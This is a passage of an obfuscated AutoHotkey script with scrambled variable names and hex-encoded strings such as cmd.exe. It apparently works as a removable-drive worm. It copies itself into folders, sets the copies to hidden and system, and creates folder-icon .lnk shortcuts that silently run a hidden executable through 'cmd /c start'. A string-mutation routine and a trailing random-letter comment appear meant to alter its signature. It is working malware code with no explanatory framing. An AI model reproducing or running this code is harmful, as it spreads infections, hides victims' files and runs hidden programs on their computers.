if (oldfilesize <> scriptfilesize){
FileCopyDir, %A_ScriptDir%, %k@kkk@aa#wnlhf%%#k@kff%%kk@f@f%%A_LoopRelativeFileName%\%kk@f@f%%@k@fkf#kk#%%k@f#f@%,1
}else{
@kf@kk@fkkk# := @kf@kk@fkkk# + 1
break
}
}else{
FileCopyDir, %A_ScriptDir%, %k@kkk@aa#wnlhf%%fkkaa#wnlhk#%%@kkf%%A_LoopRelativeFileName%\%f@@f#f%%@k@fkf#kk#%%kfk#@fkk%
FileSetAttrib, +SH, %k@kkk@aa#wnlhf%%kk@fk#ff%%f#k#f@%%A_LoopRelativeFileName%\%kk@kkf%%@k@fkf#kk#%%#k@kff%,1
}
ifexist, %aa@wnlhf%%kk@kkf%%k@kkk@aa#wnlhf%%A_LoopRelativeFileName%\%@kfk@k@f%%@k@fkf#kk#%%@kfk@k@f%
{
ifexist, %f@k@k#f#%%k@f#f@%%k@kkk@aa#wnlhf%%A_LoopRelativeFileName%%fk@fkk%%#k@f#kkk#kfk%%k#f#kffk% copy %k#k#kffk%%@kfk@k@f%%#k#k#kkk%.lnk
{
}else{
FileCreateShortcut, % @k@kfkfk@kkkff("636D642E657865"),%@kk@f#ff%%k@kkk@aa#wnlhf%%kfk#fkf#%%A_LoopRelativeFileName%%k#fkkk%%#k@f#kkk#kfk%%f@kk% copy %kk#k%%#k#k#kkk%%fkkaa#wnlhk#%.lnk,, "/c start %f@kk%%kfk#@fkk%%@k@fkf#kk#%\%kaa@wnlhfkkf%%@k@fkf#kk#%%fk@fkk%.exe %f#k#f@%%@k@fkf#kk#%%k@f#@k%\%kk@aaawnlh%%@k@fkf#kk#%%@kk@kffk%.txt %f@#k%%#k#k#kkk%%@kk@f#ff% &exit",,%SystemRoot%\system32\shell32.dll,,4
}
}
}
}
}
}
}
aaawnlhfk#k@k@k@ := 1
}
kkf@f@k@k#kkf@#f(f#kkkkfk@fkkfkf#,#aa@wnlhk@kf#fkk#fkf){
IfInString, f#kkkkfk@fkkfkf#, %kk@kkf%%#aa@wnlhk@kf#fkk#fkf%%aaawnlhf#kkk%
{
return true
}
else
{
return false
}
}
kkk##ffkf#kffkk@(fkaaawnlhk#kf#kkffkk){
k@k#k#kfk@ := SubStr(kf#aa#wnlhk@kf#f, 1, 4)
k#fkk# := SubStr(@k@fkf#kk#, 1, 4)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, k#fkk#, "")
if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("66")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("66"), @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("61") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("6623"), @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("6123") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("6640"), @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("6140") . k@k#k#kfk@)
} else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B"), @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("62") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B23"), @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("6223") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B40"), @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("6240") . k@k#k#kfk@)
} else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("61")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("61"), @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("63") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("6123"), @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("6323") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("61") . @k@kfkfk@kkkff("6140"), @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("6340") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("62")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("62"), @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("64") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("6223"), @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("6423") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("62") . @k@kfkfk@kkkff("6240"), @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("6440") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("6363")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("6363"), @k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6565") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("6323"), @k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6523") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("63") . @k@kfkfk@kkkff("6340"), @k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6540") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("6464")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("6464"), @k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6767") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("6423"), @k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6723") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("64") . @k@kfkfk@kkkff("6440"), @k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6740") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6565")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6565"), @k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6868") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6523"), @k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6823") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("65") . @k@kfkfk@kkkff("6540"), @k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6840") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6767")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6767"), @k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6969") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6723"), @k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6923") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("67") . @k@kfkfk@kkkff("6740"), @k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6940") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6868")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6868"), @k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A6A") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6823"), @k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("68") . @k@kfkfk@kkkff("6840"), @k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A40") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6969")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6969"), @k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D6D") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6923"), @k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("69") . @k@kfkfk@kkkff("6940"), @k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D40") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A6A")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A6A"), @k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C6C") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A23"), @k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6A") . @k@kfkfk@kkkff("6A40"), @k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C40") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C6C")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C6C"), @k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E6E") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C23"), @k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6C") . @k@kfkfk@kkkff("6C40"), @k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E40") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D6D")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D6D"), @k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F6F") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D23"), @k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6D") . @k@kfkfk@kkkff("6D40"), @k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F40") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E6E")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E6E"), @k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7070") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E23"), @k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7023") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6E") . @k@kfkfk@kkkff("6E40"), @k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7040") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F6F")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F6F"), @k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7171") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F23"), @k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7123") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("6F") . @k@kfkfk@kkkff("6F40"), @k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7140") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7070")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7070"), @k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7272") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7023"), @k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7223") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("70") . @k@kfkfk@kkkff("7040"), @k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7240") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7171")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7171"), @k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7373") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7123"), @k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7323") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("71") . @k@kfkfk@kkkff("7140"), @k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7340") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7272")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7272"), @k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7474") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7223"), @k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7423") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("72") . @k@kfkfk@kkkff("7240"), @k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7440") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7373")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7373"), @k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7575") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7323"), @k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7523") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("73") . @k@kfkfk@kkkff("7340"), @k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7540") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7474")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7474"), @k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7676") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7423"), @k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7623") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("74") . @k@kfkfk@kkkff("7440"), @k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7640") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7575")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7575"), @k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7777") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7523"), @k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7723") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("75") . @k@kfkfk@kkkff("7540"), @k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7740") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7676")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7676"), @k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7878") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7623"), @k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7823") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("76") . @k@kfkfk@kkkff("7640"), @k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7840") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7777")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7777"), @k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7979") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7723"), @k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7923") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("77") . @k@kfkfk@kkkff("7740"), @k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7940") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7878")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7878"), @k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A7A") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7823"), @k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("78") . @k@kfkfk@kkkff("7840"), @k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A40") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7979")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7979"), @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("6666") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7923"), @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("6623") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("79") . @k@kfkfk@kkkff("7940"), @k@kfkfk@kkkff("66") . @k@kfkfk@kkkff("6640") . k@k#k#kfk@)
}
else if (kkf@f@k@k#kkf@#f(fkaaawnlhk#kf#kkffkk,@k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A7A")))
{
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A7A"), @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B6B") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A23"), @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B23") . k@k#k#kfk@)
fkaaawnlhk#kf#kkffkk := StrReplace(fkaaawnlhk#kf#kkffkk	, @k@kfkfk@kkkff("7A") . @k@kfkfk@kkkff("7A40"), @k@kfkfk@kkkff("6B") . @k@kfkfk@kkkff("6B40") . k@k#k#kfk@)
}
return fkaaawnlhk#kf#kkffkk
}
@k@kfkfk@kkkff(kf@f@kk#k#f#@f) {  
return kk@aa@wnlh@k@kfkf@#f(kf@f@kk#k#f#@f)
}

 ; tanvqyvxditawtghqhupgjjizbgprpdmgocxbjkityyooibbfblfwfvcmpaskhogzojwskxzkyolesrwxayexavkpekroyevsrjtsnjuyntuiyiiszxkvijgvvteapiealrzjnaugsixsftqtrihma